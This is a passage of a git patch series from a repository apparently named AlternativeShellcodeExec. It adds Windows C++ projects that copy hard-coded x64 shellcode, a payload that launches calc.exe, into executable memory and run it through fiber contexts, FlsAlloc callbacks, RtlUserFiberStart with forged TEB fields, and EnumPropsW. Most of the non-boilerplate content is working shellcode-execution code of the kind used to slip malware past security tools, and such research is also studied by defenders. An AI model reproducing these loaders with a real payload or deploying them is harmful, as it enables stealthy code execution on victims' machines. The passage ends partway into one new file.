LoadOwner : Pos 12, 1 Bit + +0x17ee LoaderWorker : Pos 13, 1 Bit + +0x17ee SkipLoaderInit : Pos 14, 1 Bit + + */ + + //_TEB* teb = NtCurrentTeb(); + //NT_TIB* tib = (NT_TIB*)teb; + //void* pTebFlags = (void*)((uintptr_t)teb + 0x17ee); + //char tebFlags = *(char*)pTebFlags; // it's actually a WORD but I don't care about the second byte + // + //BOOL hasFibData = (tebFlags >> 2) & 0b1; // False here, as the current thread is not yet a fiber + // + //printf("TebFlag => 0x%x\n", tebFlags); + //printf("Has Fiber Data : %s\n", (hasFibData ? "true" : "false")); + //printf("Fiber Data Ptr: %p\n", tib->FiberData); + + //https://github.com/reactos/reactos/blob/2e1aeb12dfd8b44b4b57d377b59ef347dfe3386e/dll/win32/kernel32/client/fiber.c#L256 + ConvertThreadToFiber(NULL); + + + //tebFlags = *(char*)pTebFlags; + //hasFibData = (tebFlags >> 2) & 0b1; // True here after call to ConvertThreadToFiber + // + //printf("TebFlag => 0x%x\n", tebFlags); + //printf("Has Fiber Data : %s\n", (hasFibData ? "true" : "false")); + //printf("Fiber Data Ptr: %p\n", tib->FiberData); + // + + /* + Important to note that tib->FiberData == __readgsqword(0x20) + */ + + LPVOID lpFiber = CreateFiber(0x100, (LPFIBER_START_ROUTINE)dummy, NULL); + LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + RtlMoveMemory(addr, op, sizeof(op)); + if (lpFiber == NULL) { + printf("GLE : %d", GetLastError()); + exit(0); + } + + /* + + Here we are changing the Fiber Context such that the Created Fiber's entry point + (lpFiber + 0xb0) + Now points to the newly allocated Shellcode. + + The fiber context resides at the created buffer returned by CreateFiber + + */ + uintptr_t* tgtFuncAddr = (uintptr_t*)((uintptr_t)lpFiber + 0xB0); + *tgtFuncAddr = (uintptr_t)addr; + + SwitchToFiber(lpFiber); +} \ No newline at end of file From c514775d4fe162545e594239968719fa3d7023c3 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 28 Mar 2021 09:05:46 -0400 Subject: [PATCH 04/28] Dummy values everywhere --- AlternativeShellcodeExec.sln | 10 ++ FlsAlloc/FlsAlloc.cpp | 38 ++++++++ FlsAlloc/FlsAlloc.vcxproj | 147 ++++++++++++++++++++++++++++++ FlsAlloc/FlsAlloc.vcxproj.filters | 22 +++++ 4 files changed, 217 insertions(+) create mode 100644 FlsAlloc/FlsAlloc.cpp create mode 100644 FlsAlloc/FlsAlloc.vcxproj create mode 100644 FlsAlloc/FlsAlloc.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 6b123db..31f9a07 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -51,6 +51,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InitOnceExecuteOnce", "Init EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberContextEdit\FiberContextEdit.vcxproj", "{1E97F40F-E056-4468-94EA-15636B98B5D0}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FlsAlloc", "FlsAlloc\FlsAlloc.vcxproj", "{784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -251,6 +253,14 @@ Global {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x64.Build.0 = Release|x64 {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.ActiveCfg = Release|Win32 {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.Build.0 = Release|Win32 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Debug|x64.ActiveCfg = Debug|x64 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Debug|x64.Build.0 = Debug|x64 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Debug|x86.ActiveCfg = Debug|Win32 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Debug|x86.Build.0 = Debug|Win32 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x64.ActiveCfg = Release|x64 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x64.Build.0 = Release|x64 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.ActiveCfg = Release|Win32 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/FlsAlloc/FlsAlloc.cpp b/FlsAlloc/FlsAlloc.cpp new file mode 100644 index 0000000..4076e18 --- /dev/null +++ b/FlsAlloc/FlsAlloc.cpp @@ -0,0 +1,38 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + +int main() { + + HANDLE hProcess = ::GetCurrentProcess(); + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + DWORD dIndex = ::FlsAlloc((PFLS_CALLBACK_FUNCTION)address); + CONST CHAR* dummy = "dummy"; + + FlsSetValue(dIndex, &dummy); + +} \ No newline at end of file diff --git a/FlsAlloc/FlsAlloc.vcxproj b/FlsAlloc/FlsAlloc.vcxproj new file mode 100644 index 0000000..be1f73e --- /dev/null +++ b/FlsAlloc/FlsAlloc.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {784e8c7b-ccb3-40cf-8fef-7d01a563cee5} + FlsAlloc + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/FlsAlloc/FlsAlloc.vcxproj.filters b/FlsAlloc/FlsAlloc.vcxproj.filters new file mode 100644 index 0000000..e91adf8 --- /dev/null +++ b/FlsAlloc/FlsAlloc.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 1419707e77629e418b791502fdb31d700eb9a98b Mon Sep 17 00:00:00 2001 From: alfarom256 Date: Sun, 28 Mar 2021 12:44:45 -0400 Subject: [PATCH 05/28] Added RtlUserFiberStart method. --- AlternativeShellcodeExec.sln | 10 ++ RtlUserFiberStart/RtlUserFiberStart.vcxproj | 147 ++++++++++++++++++ .../RtlUserFiberStart.vcxproj.filters | 22 +++ RtlUserFiberStart/Source.cpp | 56 +++++++ 4 files changed, 235 insertions(+) create mode 100644 RtlUserFiberStart/RtlUserFiberStart.vcxproj create mode 100644 RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters create mode 100644 RtlUserFiberStart/Source.cpp diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 6b123db..c53c3bc 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -51,6 +51,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InitOnceExecuteOnce", "Init EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberContextEdit\FiberContextEdit.vcxproj", "{1E97F40F-E056-4468-94EA-15636B98B5D0}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RtlUserFiberStart", "RtlUserFiberStart\RtlUserFiberStart.vcxproj", "{667D6630-708C-43D1-BFEB-733FF67B55D8}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -251,6 +253,14 @@ Global {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x64.Build.0 = Release|x64 {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.ActiveCfg = Release|Win32 {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.Build.0 = Release|Win32 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Debug|x64.ActiveCfg = Debug|x64 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Debug|x64.Build.0 = Debug|x64 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Debug|x86.ActiveCfg = Debug|Win32 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Debug|x86.Build.0 = Debug|Win32 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Release|x64.ActiveCfg = Release|x64 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Release|x64.Build.0 = Release|x64 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Release|x86.ActiveCfg = Release|Win32 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/RtlUserFiberStart/RtlUserFiberStart.vcxproj b/RtlUserFiberStart/RtlUserFiberStart.vcxproj new file mode 100644 index 0000000..96da45f --- /dev/null +++ b/RtlUserFiberStart/RtlUserFiberStart.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {667d6630-708c-43d1-bfeb-733ff67b55d8} + RtlUserFiberStart + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters b/RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters new file mode 100644 index 0000000..3e7e62e --- /dev/null +++ b/RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/RtlUserFiberStart/Source.cpp b/RtlUserFiberStart/Source.cpp new file mode 100644 index 0000000..2ef1d6d --- /dev/null +++ b/RtlUserFiberStart/Source.cpp @@ -0,0 +1,56 @@ +// alfarom256 + +#include +#include + +#define TEB_FIBERDATA_PTR_OFFSET 0x17ee +#define LPFIBER_RIP_OFFSET 0x0a8 + +// calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + +typedef int(WINAPI* tRtlUserFiberStart)(); + +int main() { + HMODULE hMod = GetModuleHandleA("ntdll"); + if (!hMod) { return -1; } + tRtlUserFiberStart lpRtlUserFiberStart = (tRtlUserFiberStart)GetProcAddress(hMod, "RtlUserFiberStart"); + if (!lpRtlUserFiberStart) { return -1; } + + _TEB* teb = NtCurrentTeb(); + NT_TIB* tib = (NT_TIB*)teb; + void* pTebFlags = (void*)((uintptr_t)teb + TEB_FIBERDATA_PTR_OFFSET); + *(char*)pTebFlags = *(char*)pTebFlags | 0b100; // set the HasFiberData bit + + LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!addr) { + return GetLastError(); + } + RtlMoveMemory(addr, op, sizeof(op)); + + uintptr_t lpDummyFiberData = (uintptr_t)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x100); + *(LPVOID*)(lpDummyFiberData + 0x0a8) = addr; // store the shelcode address at the offset of the FiberContext RIP in the Fiber Data + //call qword ptr [ntdll!_guard_dispatch_icall_fptr (00007ffa`218b4000)] ds:00007ffa`218b4000={ntdll!guard_dispatch_icall_nop (00007ffa`217cfa80)} + + __writegsqword(0x20, lpDummyFiberData); // set the FiberData pointer + lpRtlUserFiberStart(); +} From 127f66746f42f3a0277316480174b6ffc31058c3 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 28 Mar 2021 22:22:00 -0400 Subject: [PATCH 06/28] Anotha One --- AlternativeShellcodeExec.sln | 10 ++ EnumPropsW/EnumPropsW.cpp | 38 +++++++ EnumPropsW/EnumPropsW.vcxproj | 147 ++++++++++++++++++++++++++ EnumPropsW/EnumPropsW.vcxproj.filters | 22 ++++ 4 files changed, 217 insertions(+) create mode 100644 EnumPropsW/EnumPropsW.cpp create mode 100644 EnumPropsW/EnumPropsW.vcxproj create mode 100644 EnumPropsW/EnumPropsW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 31f9a07..142bd97 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -53,6 +53,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberCo EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FlsAlloc", "FlsAlloc\FlsAlloc.vcxproj", "{784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPropsW", "EnumPropsW\EnumPropsW.vcxproj", "{2253DC4A-3941-4809-A20D-416CA71F799A}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -261,6 +263,14 @@ Global {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x64.Build.0 = Release|x64 {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.ActiveCfg = Release|Win32 {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.Build.0 = Release|Win32 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Debug|x64.ActiveCfg = Debug|x64 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Debug|x64.Build.0 = Debug|x64 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Debug|x86.ActiveCfg = Debug|Win32 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Debug|x86.Build.0 = Debug|Win32 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x64.ActiveCfg = Release|x64 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x64.Build.0 = Release|x64 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x86.ActiveCfg = Release|Win32 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumPropsW/EnumPropsW.cpp b/EnumPropsW/EnumPropsW.cpp new file mode 100644 index 0000000..ef48f86 --- /dev/null +++ b/EnumPropsW/EnumPropsW.cpp @@ -0,0 +1,38 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + HWND dummy = ::GetTopWindow(NULL); + ::EnumPropsW(dummy, (PROPENUMPROCW)addr); + + return 0; +} \ No newline at end of file diff --git a/EnumPropsW/EnumPropsW.vcxproj b/EnumPropsW/EnumPropsW.vcxproj new file mode 100644 index 0000000..3d4575d --- /dev/null +++ b/EnumPropsW/EnumPropsW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {2253dc4a-3941-4809-a20d-416ca71f799a} + EnumPropsW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumPropsW/EnumPropsW.vcxproj.filters b/EnumPropsW/EnumPropsW.vcxproj.filters new file mode 100644 index 0000000..43f1f08 --- /dev/null +++ b/EnumPropsW/EnumPropsW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 3a41ab1ee90031fab95a6fb949b8d33a5e442c3d Mon Sep 17 00:00:00 2001 From: alfarom256 Date: Tue, 30 Mar 2021 13:58:17 -0400 Subject: [PATCH 07/28] Added LdrpCallInitRoutine --- AlternativeShellcodeExec.sln | 10 ++ .../LdrpCallInitRoutine.vcxproj | 147 ++++++++++++++++++ .../LdrpCallInitRoutine.vcxproj.filters | 22 +++ LdrpCallInitRoutine/Source.cpp | 48 ++++++ 4 files changed, 227 insertions(+) create mode 100644 LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj create mode 100644 LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters create mode 100644 LdrpCallInitRoutine/Source.cpp diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 31f9a07..c1d8717 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -53,6 +53,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberCo EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FlsAlloc", "FlsAlloc\FlsAlloc.vcxproj", "{784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrpCallInitRoutine", "LdrpCallInitRoutine\LdrpCallInitRoutine.vcxproj", "{6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -261,6 +263,14 @@ Global {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x64.Build.0 = Release|x64 {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.ActiveCfg = Release|Win32 {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.Build.0 = Release|Win32 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Debug|x64.ActiveCfg = Debug|x64 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Debug|x64.Build.0 = Debug|x64 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Debug|x86.ActiveCfg = Debug|Win32 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Debug|x86.Build.0 = Debug|Win32 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Release|x64.ActiveCfg = Release|x64 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Release|x64.Build.0 = Release|x64 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Release|x86.ActiveCfg = Release|Win32 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj b/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj new file mode 100644 index 0000000..dbb0e37 --- /dev/null +++ b/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {6c619aa0-a97b-441d-8a7c-ee86bfeb7d62} + LdrpCallInitRoutine + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters b/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters new file mode 100644 index 0000000..3e7e62e --- /dev/null +++ b/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/LdrpCallInitRoutine/Source.cpp b/LdrpCallInitRoutine/Source.cpp new file mode 100644 index 0000000..e80f0e4 --- 